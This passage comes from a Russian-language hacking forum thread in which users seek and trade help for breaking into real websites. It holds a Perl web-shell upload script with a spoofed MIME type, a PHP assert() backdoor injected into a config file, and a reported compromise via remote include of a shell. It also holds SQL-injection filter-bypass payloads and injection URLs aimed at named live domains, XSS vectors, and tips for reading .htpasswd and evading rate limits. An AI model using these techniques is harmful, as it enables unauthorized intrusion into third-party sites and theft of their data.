print $sBaseUrl . '?ec=1000'; //пропущены обязательные параметры
}


.SpoilerTarget" type="button">Spoiler: share-class


Code:
auid = $auid;
$this->fileInfo = $fileInfo;
$this->previewInfo = $previewInfo;
$this->shareType = $shareType;
$this->sign = $sign;
}

/**
* @param $sFolder
*/
private function createFolder($sFolder)
{
if (!file_exists($sFolder)) {
mkdir($sFolder, 0777);
}
}

/**
* @return null|string
*/
private function createUserFolder()
{
if ($this->auid) {
$shareFolder = dirname(__FILE__) . '/../../' . $this->oConfig->shareFolderName;
$this->createFolder($shareFolder);
$shareFolder10000 = $shareFolder . (intval($this->auid/10000)) . '/';
$this->createFolder($shareFolder10000);
$shareFolder1000 = $shareFolder10000 . (intval($this->auid/1000)) . '/';
$this->createFolder($shareFolder1000);
$shareFolder100 = $shareFolder1000 . (intval($this->auid/100)) . '/';
$this->createFolder($shareFolder100);
$shareFolder1 = $shareFolder100 . (intval($this->auid)) . '/';
$this->createFolder($shareFolder1);
return $shareFolder1;
}

return null;
}

/**
* @return string
*/
public function getUserFolder()
{
return $this->oConfig->shareFolderName . intval($this->auid/10000) . '/' . intval($this->auid/1000)
. '/' . intval($this->auid/100) . '/' . intval($this->auid) . '/';
}

/**
* @param $oConfig
*/
public function setConfig($oConfig)
{
$this->oConfig = $oConfig;
$this->dbInfo = array(
'mysqlHost' => $this->oConfig->host,
'mysqlUser' => $this->oConfig->user,
'mysqlPassword' => $this->oConfig->password,
'mysqlDB' => $this->oConfig->db,
);
}

/**
* @param $auid
*/
public function setAuid($auid)
{
$this->auid = $auid;
}

/**
* @param $sResult
* @return int
*/
public function doShare(& $sResult)
{
$sUserFolder = $this->createUserFolder();
if (!$sUserFolder) return 1003; //ошибка при загрузке файла на сервер

$time = time();

// Заливаем основную картинку
$imageInfo = getimagesize($this->fileInfo['tmp_name']);
if (empty($imageInfo[0]) || empty($imageInfo[1])) return 1002; //неверный тип файла
if (!in_array($imageInfo['mime'], $this->allowedMime)) return 1002; //неверный тип файла
$aExt = explode('/', $imageInfo['mime']);
$fileName = $time . '.' . $aExt[1];
$sDest = $sUserFolder . $fileName;
move_uploaded_file($this->fileInfo['tmp_name'], $sDest);

// Заливаем превью (если есть что)
$previewFileName = '';
if ($this->previewInfo) {
$imageInfo = getimagesize($this->previewInfo['tmp_name']);
if (empty($imageInfo[0]) || empty($imageInfo[1])) return 1002; //неверный тип файла
if (!in_array($imageInfo['mime'], $this->allowedMime)) return 1002; //неверный тип файла
$aExt = explode('/', $imageInfo['mime']);
$previewFileName = $time . '-thumb.' . $aExt[1];
$sDest = $sUserFolder . $previewFileName;
move_uploaded_file($this->previewInfo['tmp_name'], $sDest);
}

// Сохраняем, формируем ответ, если ОК
$iResult = $this->save($fileName, $previewFileName);
if (!$iResult) return 1004;
$sResult = '?share='.$iResult;

return 1;
}

/**
* @param $fileName
* @param string $previewFileName
* @return mixed
*/
public function save($fileName, $previewFileName = '')
{
$oSQL = mysqlConnect::getInstance($this->dbInfo);
$oSQL->query('INSERT INTO tbl_share_info (auid, filename, preview_filename, sharedate) VALUES ('
. intval($this->auid) . ', "' . $fileName . '", "' . $previewFileName . '", NOW())');

return $oSQL->insert_id;
}

/**
* @param $id
* @return mixed
*/
public function get($id)
{
$oSQL = mysqlConnect::getInstance($this->dbInfo);
$oResult = $oSQL->query('SELECT * FROM tbl_share_info WHERE id=' . intval($id));

return $oResult->fetch_array();
}

/**
* @param $id
* @return int
*/
public function getPrev($id)
{
$oSQL = mysqlConnect::getInstance($this->dbInfo);
$oResult = $oSQL->query('SELECT MAX(id) as prev FROM tbl_share_info WHERE idfetch_array();

return intval($aRow['prev']);
}

/**
* @param $id
* @return int
*/
public function getNext($id)
{
$oSQL = mysqlConnect::getInstance($this->dbInfo);
$oResult = $oSQL->query('SELECT MIN(id) as next FROM tbl_share_info WHERE id>' . intval($id));
$aRow = $oResult->fetch_array();

return intval($aRow['next']);
}

/**
* @param $auid
* @return mixed
*/
public function checkUserScreens($auid)
{
$oSQL = mysqlConnect::getInstance($this->dbInfo);
$oResult = $oSQL->query('SELECT COUNT(*) AS iCnt FROM tbl_share_info WHERE auid=' . intval($auid));
$aRow = $oResult->fetch_assoc();

return $aRow['iCnt'];
}

/**
* @param $auid
* @return array
*/
public function getUserScreens($auid)
{
$oSQL = mysqlConnect::getInstance($this->dbInfo);
$oResult = $oSQL->query('SELECT * FROM tbl_share_info WHERE auid=' . intval($auid) . ' ORDER BY sharedate DESC');
$aResult = array();
while ($aRow = $oResult->fetch_assoc()) {
$aResult[] = $aRow;
}

return $aResult;
}
}

winstrool
14.11.2018, 16:29
Muracha said:
↑ (https://antichat.live/posts/4260337/)
Есть скрипт на perl c помощью которого я хочу залить на сайт веб шелл с подменой MIME-типа:
Spoiler: сплойлер

Code:
#!/usr/bin/perl
#
use LWP;
use HTTP::Request::Common;
$ua = $ua = LWP::UserAgent->new;;
$res = $ua->request(POST 'Уязвимый Сайт',
Content_Type => ' multipart/form-data; boundary="JiFT4QdEESkPzh0ybiDyKsUPi1jnCyFCgVtV4xHE"
X-Unity-Version: 5.6.5f1',
Content => [userfile => ["C:/jpeg.jpg.php", "jpeg.jpg.php", "Content-Type" =>"image/png", "iAuid" => "6cb4dbkgvato004v6i4vugq6q2","sSign" => "5msfdbv9gsct64cbo9e3hbc3p0", "content" => "" ],],);

print $res->as_string();

Но я не могу составить запрос таким образом, чтобы он принял файл. Постоянно натыкаюсь на ошибку 1000(что в скрипте значит - неправильно передан в параметре)
В самом бурпе натыкаюсь уже на 1002 - (неверный тип файла)
Подскажите, как правильно составить запрос на PERL, чтобы сайт принимал файл?
Spoiler: share

Code:
setConfig($oConfig);
$sShareUrl = null;
$iResult = $oSharer->doShare($sShareUrl);
if ($iResult == 1) {
print $sBaseUrl . $sShareUrl;
} else {
print $sBaseUrl . '?ec=' . $iResult;
}
} else {
error_log('Sign is incorrect => iAuid:' . $iAuid . ' sSign:' . $sSign . ' sScriptUri:' . $sScriptUri);
print $sBaseUrl . '?ec=1001'; //подпись не совпадает
}
} else {
error_log('Some parameters are not set => iAuid:' . $iAuid . ' sSign:' . $sSign . ' Image:' . ($Image ? '+' : '-'));
print $sBaseUrl . '?ec=1000'; //пропущены обязательные параметры
}

Spoiler: share-class

Code:
auid = $auid;
$this->fileInfo = $fileInfo;
$this->previewInfo = $previewInfo;
$this->shareType = $shareType;
$this->sign = $sign;
}

/**
* @param $sFolder
*/
private function createFolder($sFolder)
{
if (!file_exists($sFolder)) {
mkdir($sFolder, 0777);
}
}

/**
* @return null|string
*/
private function createUserFolder()
{
if ($this->auid) {
$shareFolder = dirname(__FILE__) . '/../../' . $this->oConfig->shareFolderName;
$this->createFolder($shareFolder);
$shareFolder10000 = $shareFolder . (intval($this->auid/10000)) . '/';
$this->createFolder($shareFolder10000);
$shareFolder1000 = $shareFolder10000 . (intval($this->auid/1000)) . '/';
$this->createFolder($shareFolder1000);
$shareFolder100 = $shareFolder1000 . (intval($this->auid/100)) . '/';
$this->createFolder($shareFolder100);
$shareFolder1 = $shareFolder100 . (intval($this->auid)) . '/';
$this->createFolder($shareFolder1);
return $shareFolder1;
}

return null;
}

/**
* @return string
*/
public function getUserFolder()
{
return $this->oConfig->shareFolderName . intval($this->auid/10000) . '/' . intval($this->auid/1000)
. '/' . intval($this->auid/100) . '/' . intval($this->auid) . '/';
}

/**
* @param $oConfig
*/
public function setConfig($oConfig)
{
$this->oConfig = $oConfig;
$this->dbInfo = array(
'mysqlHost' => $this->oConfig->host,
'mysqlUser' => $this->oConfig->user,
'mysqlPassword' => $this->oConfig->password,
'mysqlDB' => $this->oConfig->db,
);
}

/**
* @param $auid
*/
public function setAuid($auid)
{
$this->auid = $auid;
}

/**
* @param $sResult
* @return int
*/
public function doShare(& $sResult)
{
$sUserFolder = $this->createUserFolder();
if (!$sUserFolder) return 1003; //ошибка при загрузке файла на сервер

$time = time();

// Заливаем основную картинку
$imageInfo = getimagesize($this->fileInfo['tmp_name']);
if (empty($imageInfo[0]) || empty($imageInfo[1])) return 1002; //неверный тип файла
if (!in_array($imageInfo['mime'], $this->allowedMime)) return 1002; //неверный тип файла
$aExt = explode('/', $imageInfo['mime']);
$fileName = $time . '.' . $aExt[1];
$sDest = $sUserFolder . $fileName;
move_uploaded_file($this->fileInfo['tmp_name'], $sDest);

// Заливаем превью (если есть что)
$previewFileName = '';
if ($this->previewInfo) {
$imageInfo = getimagesize($this->previewInfo['tmp_name']);
if (empty($imageInfo[0]) || empty($imageInfo[1])) return 1002; //неверный тип файла
if (!in_array($imageInfo['mime'], $this->allowedMime)) return 1002; //неверный тип файла
$aExt = explode('/', $imageInfo['mime']);
$previewFileName = $time . '-thumb.' . $aExt[1];
$sDest = $sUserFolder . $previewFileName;
move_uploaded_file($this->previewInfo['tmp_name'], $sDest);
}

// Сохраняем, формируем ответ, если ОК
$iResult = $this->save($fileName, $previewFileName);
if (!$iResult) return 1004;
$sResult = '?share='.$iResult;

return 1;
}

/**
* @param $fileName
* @param string $previewFileName
* @return mixed
*/
public function save($fileName, $previewFileName = '')
{
$oSQL = mysqlConnect::getInstance($this->dbInfo);
$oSQL->query('INSERT INTO tbl_share_info (auid, filename, preview_filename, sharedate) VALUES ('
. intval($this->auid) . ', "' . $fileName . '", "' . $previewFileName . '", NOW())');

return $oSQL->insert_id;
}

/**
* @param $id
* @return mixed
*/
public function get($id)
{
$oSQL = mysqlConnect::getInstance($this->dbInfo);
$oResult = $oSQL->query('SELECT * FROM tbl_share_info WHERE id=' . intval($id));

return $oResult->fetch_array();
}

/**
* @param $id
* @return int
*/
public function getPrev($id)
{
$oSQL = mysqlConnect::getInstance($this->dbInfo);
$oResult = $oSQL->query('SELECT MAX(id) as prev FROM tbl_share_info WHERE idfetch_array();

return intval($aRow['prev']);
}

/**
* @param $id
* @return int
*/
public function getNext($id)
{
$oSQL = mysqlConnect::getInstance($this->dbInfo);
$oResult = $oSQL->query('SELECT MIN(id) as next FROM tbl_share_info WHERE id>' . intval($id));
$aRow = $oResult->fetch_array();

return intval($aRow['next']);
}

/**
* @param $auid
* @return mixed
*/
public function checkUserScreens($auid)
{
$oSQL = mysqlConnect::getInstance($this->dbInfo);
$oResult = $oSQL->query('SELECT COUNT(*) AS iCnt FROM tbl_share_info WHERE auid=' . intval($auid));
$aRow = $oResult->fetch_assoc();

return $aRow['iCnt'];
}

/**
* @param $auid
* @return array
*/
public function getUserScreens($auid)
{
$oSQL = mysqlConnect::getInstance($this->dbInfo);
$oResult = $oSQL->query('SELECT * FROM tbl_share_info WHERE auid=' . intval($auid) . ' ORDER BY sharedate DESC');
$aResult = array();
while ($aRow = $oResult->fetch_assoc()) {
$aResult[] = $aRow;
}

return $aResult;
}
}



Заливаете сам шел? попробуйте лить саму картинку и в ее метотегах прописать мини бэгдорчик, а там если прольется, с него уже и лейте шелл.

Muracha
14.11.2018, 17:05
По скрипту он сначала проверяет на соответствие программ.

И говорит о том, что указаны неверные параметры, хотя все указано верно.

После он уже проверяет на MIME

Проблема с указанием параметров из-за незнания перла..да и бурпа.

Пример из бурпа, он уже дает ошибку 1002 и совершенно непонятно, почему в скрипте пишет ошибку 1000(неверны переданы параметры), а через бурп 1002(некорректный MIME файл) хотя я загружаю чистую картинку, без примесей

.SpoilerTarget" type="button">Spoiler: 1


Code:
POST /share.php HTTP/1.1
Host: Сайт
Connection: close
User-Agent: UnityPlayer/5.6.5f1 (http://unity3d.com)
Content-Type: multipart/form-data; boundary="JiFT4QdEESkPzh0ybiDyKsUPi1jnCyFCgVtV4xHE"
Content-Length: 591093

--JiFT4QdEESkPzh0ybiDyKsUPi1jnCyFCgVtV4xHE
Content-Type: text/plain; charset="utf-8"
Content-disposition: form-data; name="auid"

343296
--JiFT4QdEESkPzh0ybiDyKsUPi1jnCyFCgVtV4xHE
Content-Type: text/plain; charset="utf-8"
Content-disposition: form-data; name="sign"

3ca4df16083f3d3ad33409014fdf43c4
--JiFT4QdEESkPzh0ybiDyKsUPi1jnCyFCgVtV4xHE
Content-Type: image/png
Content-disposition: form-data; name="content"; filename="content"
Картинка

etime
15.11.2018, 21:36
Всем привет. На сайте установлена HTTP Basic Authentication. У меня есть права на чтение файлов на сервере через sql. Как я понял на сервере Nginx отсутствует такой файл как .htaccess в нем обычно прописывают путь до .htpasswd, но так как такого файла нет, все настройки делаются как опять же я понял в nginx.conf. Этот файл конфигурации я скачал с сервера, но там нет пути до .htpasswd или чего то подобного.

Вопрос, где искать этот самый путь до .htpasswd ?

Какие есть еще файлы настроек у nginx чтобы можно было прочитать?

Всего нашел два файла /etc/nginx/nginx.conf и /etc/nginx/mime.types ( и еще /etc/nginx/.htpasswd , но файл почему то пустой.)

fandor9
16.11.2018, 02:07
etime said:
↑ (https://antichat.live/posts/4260741/)
Всем привет. На сайте установлена HTTP Basic Authentication. У меня есть права на чтение файлов на сервере через sql. Как я понял на сервере Nginx отсутствует такой файл как .htaccess в нем обычно прописывают путь до .htpasswd, но так как такого файла нет, все настройки делаются как опять же я понял в nginx.conf. Этот файл конфигурации я скачал с сервера, но там нет пути до .htpasswd или чего то подобного.
Вопрос, где искать этот самый путь до .htpasswd ?
Какие есть еще файлы настроек у nginx чтобы можно было прочитать?
Всего нашел два файла /etc/nginx/nginx.conf и /etc/nginx/mime.types ( и еще /etc/nginx/.htpasswd , но файл почему то пустой.)


В nginx.conf находится только общая конфирурация, конфа по сайтам инклюдится. Там где в nginx.conf стоит указание include, там и написано где лежат файлы с конфой по сайтам.

В них соответственно может быть либо указание auth_basic_user_file с путём где заветный файл лежит либо дальнейшие include.

etime
16.11.2018, 07:34
fandor9 said:
↑ (https://antichat.live/posts/4260780/)
В nginx.conf находится только общая конфирурация, конфа по сайтам инклюдится. Там где в nginx.conf стоит указание include, там и написано где лежат файлы с конфой по сайтам.
В них соответственно может быть либо указание auth_basic_user_file с путём где заветный файл лежит либо дальнейшие include.


Спасибо за ответ, в данном файле указаны 3 include:

include /etc/nginx/conf.d/*.conf;

include /etc/nginx/sites-enabled/*;

include /etc/nginx/naxsi_core.rules

Получается мне нужно искать в них, но какие названия там могут быть? site.com.conf ?

fandor9
16.11.2018, 13:12
etime said:
↑ (https://antichat.live/posts/4260809/)
Спасибо за ответ, в данном файле указаны 3 include:
include /etc/nginx/conf.d/*.conf;
include /etc/nginx/sites-enabled/*;
include /etc/nginx/naxsi_core.rules
Получается мне нужно искать в них, но какие названия там могут быть? site.com.conf ?


Ну во первых nginx этот работает как WAF, так как naxsi_core.rules это файл с общими правилами этой Naxsi (https://github.com/nbs-system/naxsi/wiki).

Во вторых названия в папке /etc/nginx/sites-enabled/ могут быть любыми, так как там инклюдятся все файлы в этой папке. Скорее всего что-то вроде site.com или com.site, так же стандартом идёт файл /etc/nginx/sites-enabled/default.

etime
16.11.2018, 14:30
etime said:
↑ (https://antichat.live/posts/4260809/)
include




fandor9 said:
↑ (https://antichat.live/posts/4260876/)
Ну во первых nginx этот работает как WAF, так как naxsi_core.rules это файл с общими правилами этой
Naxsi (https://github.com/nbs-system/naxsi/wiki)
.
Во вторых названия в папке /etc/nginx/sites-enabled/ могут быть любыми, так как там инклюдятся все файлы в этой папке. Скорее всего что-то вроде site.com или com.site, так же стандартом идёт файл /etc/nginx/sites-enabled/default.


От души! Буду пробовать.

Sensoft
22.11.2018, 11:08
Code:
http://shops2.tehnomaks.ru/catalog/add_reweis?about=1&guid[]=058960&mail=sample%40email.tst&minus=1&plus=1&rate=

Обычная ошибка или SQL injection ?

ci0b2n1feec
23.11.2018, 01:56
Вопрос на засыпку есть скуля

Все select замещаются на select sql_no_cache - так что даже делать from select бесполезно

database()

version выводятся на ура

Все select переводит в select sql_no_cache (select/**/,sELeCT/*,s/**/E/**/lect,) не прокатывает,что можно сделать?)

ci0b2n1feec
23.11.2018, 16:51
man474019 said:
↑ (https://antichat.live/posts/4262895/)
/*!5000select*/
/*!12345select%20all*/
/*!12345select%0aall*/
++
buffer owerflaw


щас попробуем

ci0b2n1feec
23.11.2018, 20:48
man474019 said:
↑ (https://antichat.live/posts/4262895/)
/*!5000select*/
/*!12345select%20all*/
/*!12345select%0aall*/
++
buffer owerflaw


Не получается получаем 404 на выходе....

Скуля вида sete,com/asd(Sqlini).html

BabaDook
23.11.2018, 21:21
ci0b2n1feec said:
↑ (https://antichat.live/posts/4263103/)
Не получается получаем 404 на выходе....
Скуля вида sete,com/asd(Sqlini).html


Тут гадать никто не будет что там у тебя. тебе дали не решение , а направление. Дальше сам.

ci0b2n1feec
25.11.2018, 14:39
BabaDook said:
↑ (https://antichat.live/posts/4263123/)
Тут гадать никто не будет что там у тебя. тебе дали не решение , а направление. Дальше сам.


Гадать то некто и не просит,проблема известна)

MrBa
01.12.2018, 11:33
Можно ли как то обойти HTTP error code: 429 (Too Many Requests)?

Прокси пробовал, не помогает

grimnir
01.12.2018, 11:47
MrBa said:
↑ (https://antichat.live/posts/4265221/)
Можно ли как то обойти HTTP error code: 429 (Too Many Requests)?
Прокси пробовал, не помогает


пробуйте не только ip менять ,но и заголовки браузера .

Octavian
08.12.2018, 21:04
Привет, помогите есть плагин jQuery File Upload обычно через него легко залится но в этом случае мешает .htaccess и за которого файл принудительно скачивается. перезаписать не получается, заливается просто htaccess без точке (

https://github.com/blueimp/jQuery-File-Upload/tree/master/server/php/files

UPD:

пересмотрел 3 раза не могу понять что он там баипасит, как файл может выполняться при скачивание?

grimnir
08.12.2018, 23:08
Octavian said:
↑ (https://antichat.live/posts/4267103/)
Привет, помогите есть плагин jQuery File Upload обычно через него легко залится но в этом случае мешает .htaccess и за которого файл принудительно скачивается. перезаписать не получается, заливается просто htaccess без точке (
https://github.com/blueimp/jQuery-File-Upload/tree/master/server/php/files
UPD:
пересмотрел 3 раза не могу понять что он там баипасит, как файл может выполняться при скачивание?


В ту директорию куда он льет по умолчанию файл только дает скачаться, он написал код чтобы стянул с pastebin на 2 директории выше ../../ wget

Octavian
08.12.2018, 23:10
grimnir said:
↑ (https://antichat.live/posts/4267139/)
В ту директорию куда он льет по умолчанию файл только дает скачаться, он написал код чтобы стянул с pastebin на 2 директории выше ../../ wget


Дает скачивание после выполнение?

grimnir
08.12.2018, 23:17
Octavian said:
↑ (https://antichat.live/posts/4267140/)
Дает скачивание после выполнение?


да не факт, у него может быть и просто фейковое видео, любят они такое ,а залиться мог и заранее.

Octavian
08.12.2018, 23:21
grimnir said:
↑ (https://antichat.live/posts/4267146/)
да не факт, у него может быть и просто фейковое видео, любят они такое ,а залиться мог и заранее.


А в моем случае с htaccess настройками можно что то сделать?

https://github.com/blueimp/jQuery-File-Upload/tree/master/server/php/files

grimnir
08.12.2018, 23:23
Octavian said:
↑ (https://antichat.live/posts/4267149/)
А в моем случае с htaccess настройками можно что то сделать?
https://github.com/blueimp/jQuery-File-Upload/tree/master/server/php/files


в директорию выше литься

crlf
09.12.2018, 01:42
Octavian said:
↑ (https://antichat.live/posts/4267103/)
не могу понять что


Чувак, если ты задал вопрос на форуме, нафига его дублировать мне в телегу?


Octavian said:
↑ (https://antichat.live/posts/4267103/)
как файл может выполняться при скачивание?


Это вопрос только для автора видео. Комменты там открыты, спроси что за зиродеи он использует. Потом нам расскажешь

Недавно была шумиха, про якобы "дырявость" и разработчики упомянули об этом. (https://github.com/blueimp/jQuery-File-Upload/blob/master/VULNERABILITIES.md)

Стоит отметить, что JQuery File Upload это просто файловый загрузчик, он может и должен грузить что угодно. При этом, нормально настроенный конфиг не даёт лить что попало.

Был там в стоке фейл с регуляркой, но перед внедрением подобных скриптов в свои проекты, если не аудировать, то хотя бы, нужно производить детальную настройку. И скрипт даёт такую возможность, путём изменения значений в методе __construct для PHP варианта.

L73898UNIT
09.12.2018, 02:25
Привет, может кто подскажет.

На один сайт недавно поставили какой-то телеграм-чат-хелпер. Но забыли закрыть чтение дериктории этого чата.

Можно как-то воспользоваться этим, залить шелл и вытянуть всю инфу с сайта? Как?

p.s. открывается только chat.html; ..install.php; ...css/db/js и две папки сверху (пустые).

В инсталяторе чата не нашел какой-то возможности загрузить свой файл на сервер

Сорри за нубские вопросы, спасибо

Скрины ниже, буду благодарен любой помощи.

L73898UNIT
09.12.2018, 18:48
UPD: Пробовал внести вредоносный скрипт через пароль менеджера (перезаписывает config). Вышло только с phpinfo(), а другие функции "show_source, system, shell_exec, passthru, exec, popen, proc_open" - отключены в disable_functions. Подскажите, как еще можно реализовать атаку?

Ereee
09.12.2018, 19:28
L73898UNIT said:
↑ (https://antichat.live/posts/4267387/)
UPD: Пробовал внести вредоносный скрипт через пароль менеджера (перезаписывает config). Вышло только с phpinfo(), а другие функции "show_source, system, shell_exec, passthru, exec, popen, proc_open" - отключены в disable_functions. Подскажите, как еще можно реализовать атаку?


Попробуй eval, assert.

L73898UNIT
09.12.2018, 22:02
Ereee said:
↑ (https://antichat.live/posts/4267398/)
Попробуй eval, assert.


Успешно внедрил в ..config.php 1"); assert(stripslashes($_REQUEST[cmd])); /*


И теперь можно делать так: https://site.com/chat/..config.php?cmd=phpinfo()


Круто, но более интересные функции не работают, даже phpversion()... если я конечно правильно использую эти функции Может проблема в том, что перезаписью ..config.php ничего не добиться?

Также в phpinfo заметил:

allow_url_fopen On

allow_url_include On

Тот_самый_Щуп
10.12.2018, 00:28
MORPHINE said:
↑ (https://antichat.live/posts/4267428/)
Успешно внедрил в ..config.php
1"); assert(stripslashes($_REQUEST[cmd])); /*

И теперь можно делать так:
https://site.com/chat/..config.php?cmd=phpinfo()

Круто, но более интересные функции не работают, даже phpversion()... если я конечно правильно использую эти функции
Может проблема в том, что перезаписью ..config.php ничего не добиться?
Также в phpinfo заметил:
allow_url_fopen On

allow_url_include On


Так тебе же коллеги писали, пробуй system() passthru() copy(), но сначала найди врайтабельную папку предварительно, доступную из под веба. И не забывай, тебя дома ждет семья.

L73898UNIT
10.12.2018, 03:48
Сайт успешно взломан через cmd=include('https://site.com/shell.txt'), всем спасибо)

crlf
10.12.2018, 09:43
L73898UNIT said:
↑ (https://antichat.live/posts/4267470/)
Сайт успешно взломан


Ну всё, суши сухари.

Octavian
20.12.2018, 03:30
Есть отраженый парамерт могу я как то указать сторонии адрес чтоб выполнить XSS ? фильтруется " ' <>


Code:


А также часто встречяется отраженые параметры в


Code:
action="vdv{тут}bfd"
href="vdv{тут}bfd"

собствено можно выполнить как то XSS когда до и после параметров какой то мусор ?


Code:
action="javascript:alert(1)"
href="javascript:alert(1)"

holdik
23.12.2018, 22:45
Подскажите, как залить шелл Joomla 3, с правами администратора(не суперадмин). Шаблоны править не даёт.

за годный способ заплачу, спасибо

2dd
03.01.2019, 19:19
Помогите раскрутить SQL с жесткой фильтрацией. На входе есть 3 параметра которые попадают в SQL запрос, но мешают фильтры, поэтому у векторов с выводом в ошибку шансов совсем мало.

Решил попробовать вектор union select, через order+by подобрал колонки, их 45 штук, фильтр на слово select обходится так: union(select)

пробую запрос:


Code:
http://androfly.ir/wp-content/themes/marketica-wp/sql.php?id1=gfddg11'&id2=gfddg22'&id3=1)union(select(1),(2),(3),(4),(5),(6),(7),(8), (9),(10),(11),(12),(13),(14),(15),(16),(17),(18),( 19),(20),(21),(22),(23),(24),(25),(26),(27),(28),( 29),(30),(31),(32),(33),(34),(35),(36),(37),(38),( 39),(40),(41),(42),(43),(44),(45))#

и тут засада, такой запрос блокируется... если на одну колонку больше или меньше, то всё проходит.

буду благодарен!

DezMond™
04.01.2019, 11:38
Помогите раскрутить, странная скуля


Code:
https://www.hellinger.com/index.php?eID=tx_positioner_eID&data=%257B%2522userFunc%2522%253A%2522tx_positione r_pi1-%253Emain%2522%252C%2522ajaxResultLimit%2522%253A% 252250%2522%252C%2522listViewImageHeight%2522%253A %2522100%2522%252C%2522ajaxSearchOrderBy%2522%253A %2522substring_index%2528storename%252C%2B%2527%2B %2527%252C%2B-1%2529%2522%252C%2522_LOCAL_LANG.%2522%253A%257B%2 522de.%2522%253A%257B%2522placeholderPositionerNam e%2522%253A%2522Aufstellername%2522%257D%252C%2522 en.%2522%253A%257B%2522placeholderPositionerName%2 522%253A%2522Name%2Bof%2Bconstellator%2522%257D%25 2C%2522fr.%2522%253A%257B%2522placeholderPositione rName%2522%253A%2522Name%2Bof%2Bconstellator%2522% 257D%252C%2522it.%2522%253A%257B%2522placeholderPo sitionerName%2522%253A%2522Nome%2Bdel%2Bcostellato re%2522%257D%252C%2522es.%2522%253A%257B%2522place holderPositionerName%2522%253A%2522Nombre%2Bdel%2B constelador%2522%257D%252C%2522br.%2522%253A%257B% 2522placeholderPositionerName%2522%253A%2522Nome%2 Bdo%2Bconstelador%2522%257D%252C%2522ru.%2522%253A %257B%2522placeholderPositionerName%2522%253A%2522 %255Cu0418%255Cu043c%255Cu044f%2B%255Cu0440%255Cu0 430%255Cu0441%255Cu0441%255Cu0442%255Cu0430%255Cu0 43d%255Cu043e%255Cu0432%255Cu0449%255Cu0438%255Cu0 43a%255Cu0430%2522%257D%257D%252C%2522cosmicPowerE nabled%2522%253Anull%252C%2522templateFile%2522%25 3A%2522fileadmin%255C%252Fweb%255C%252Ftemplates%2 55C%252Fviews%255C%252Fpositioner%255C%252Ftemplat e.html%2522%252C%2522cssFile%2522%253A%2522fileadm in%255C%252Fweb%255C%252Ftemplates%255C%252Fviews% 255C%252Fpositioner%255C%252Flayout.css%2522%252C% 2522detailsPageId%2522%253A%25221205%2522%252C%252 2seminarDetailsPageId%2522%253A%2522%2522%252C%252 2mailFormPageId%2522%253A%2522%2522%252C%2522exter nalSeminarRegisterPageId%2522%253A%2522%2522%252C% 2522memberListItemsPerPage%2522%253A%2522%2522%252 C%2522memberContactPageId%2522%253A%2522%2522%252C %2522shopPageId%2522%253A%2522%2522%252C%2522testS ystem%2522%253A%25220%2522%252C%2522activityCatego ries%2522%253A%25221%252C2%252C3%252C4%252C5%252C6 %252C50%252C51%252C52%252C53%2522%252C%2522display Mode%2522%253A%2522ajaxSearchForm%2522%252C%2522pi d_list%2522%253A%2522447%2522%252C%2522_GP%2522%25 3A%257B%2522action%2522%253A%2522viewSearchForm%25 22%257D%252C%2522lang%2522%253A%2522en%2522%252C%2 522pageId%2522%253A%25221204%2522%257D&tx_positioner_pi1%5Baction%5D=search&tx_positioner_pi1%5Bsearch%5D=Germany&tx_positioner_pi1%5Blat%5D=&tx_positioner_pi1%5Blon%5D=&tx_positioner_pi1%5Bradius%5D=50&tx_positioner_pi1%5Bactivities%5D=1&tx_positioner_pi1%5Bqualification%5D=google_HD.png

cat1vo
04.01.2019, 13:54
DezMond™ said:
↑ (https://antichat.live/posts/4274746/)
Помогите раскрутить, странная скуля

Code:
https://www.hellinger.com/index.php?eID=tx_positioner_eID&data=%257B%2522userFunc%2522%253A%2522tx_positione r_pi1-%253Emain%2522%252C%2522ajaxResultLimit%2522%253A% 252250%2522%252C%2522listViewImageHeight%2522%253A %2522100%2522%252C%2522ajaxSearchOrderBy%2522%253A %2522substring_index%2528storename%252C%2B%2527%2B %2527%252C%2B-1%2529%2522%252C%2522_LOCAL_LANG.%2522%253A%257B%2 522de.%2522%253A%257B%2522placeholderPositionerNam e%2522%253A%2522Aufstellername%2522%257D%252C%2522 en.%2522%253A%257B%2522placeholderPositionerName%2 522%253A%2522Name%2Bof%2Bconstellator%2522%257D%25 2C%2522fr.%2522%253A%257B%2522placeholderPositione rName%2522%253A%2522Name%2Bof%2Bconstellator%2522% 257D%252C%2522it.%2522%253A%257B%2522placeholderPo sitionerName%2522%253A%2522Nome%2Bdel%2Bcostellato re%2522%257D%252C%2522es.%2522%253A%257B%2522place holderPositionerName%2522%253A%2522Nombre%2Bdel%2B constelador%2522%257D%252C%2522br.%2522%253A%257B% 2522placeholderPositionerName%2522%253A%2522Nome%2 Bdo%2Bconstelador%2522%257D%252C%2522ru.%2522%253A %257B%2522placeholderPositionerName%2522%253A%2522 %255Cu0418%255Cu043c%255Cu044f%2B%255Cu0440%255Cu0 430%255Cu0441%255Cu0441%255Cu0442%255Cu0430%255Cu0 43d%255Cu043e%255Cu0432%255Cu0449%255Cu0438%255Cu0 43a%255Cu0430%2522%257D%257D%252C%2522cosmicPowerE nabled%2522%253Anull%252C%2522templateFile%2522%25 3A%2522fileadmin%255C%252Fweb%255C%252Ftemplates%2 55C%252Fviews%255C%252Fpositioner%255C%252Ftemplat e.html%2522%252C%2522cssFile%2522%253A%2522fileadm in%255C%252Fweb%255C%252Ftemplates%255C%252Fviews% 255C%252Fpositioner%255C%252Flayout.css%2522%252C% 2522detailsPageId%2522%253A%25221205%2522%252C%252 2seminarDetailsPageId%2522%253A%2522%2522%252C%252 2mailFormPageId%2522%253A%2522%2522%252C%2522exter nalSeminarRegisterPageId%2522%253A%2522%2522%252C% 2522memberListItemsPerPage%2522%253A%2522%2522%252 C%2522memberContactPageId%2522%253A%2522%2522%252C %2522shopPageId%2522%253A%2522%2522%252C%2522testS ystem%2522%253A%25220%2522%252C%2522activityCatego ries%2522%253A%25221%252C2%252C3%252C4%252C5%252C6 %252C50%252C51%252C52%252C53%2522%252C%2522display Mode%2522%253A%2522ajaxSearchForm%2522%252C%2522pi d_list%2522%253A%2522447%2522%252C%2522_GP%2522%25 3A%257B%2522action%2522%253A%2522viewSearchForm%25 22%257D%252C%2522lang%2522%253A%2522en%2522%252C%2 522pageId%2522%253A%25221204%2522%257D&tx_positioner_pi1%5Baction%5D=search&tx_positioner_pi1%5Bsearch%5D=Germany&tx_positioner_pi1%5Blat%5D=&tx_positioner_pi1%5Blon%5D=&tx_positioner_pi1%5Bradius%5D=50&tx_positioner_pi1%5Bactivities%5D=1&tx_positioner_pi1%5Bqualification%5D=google_HD.png





Code:
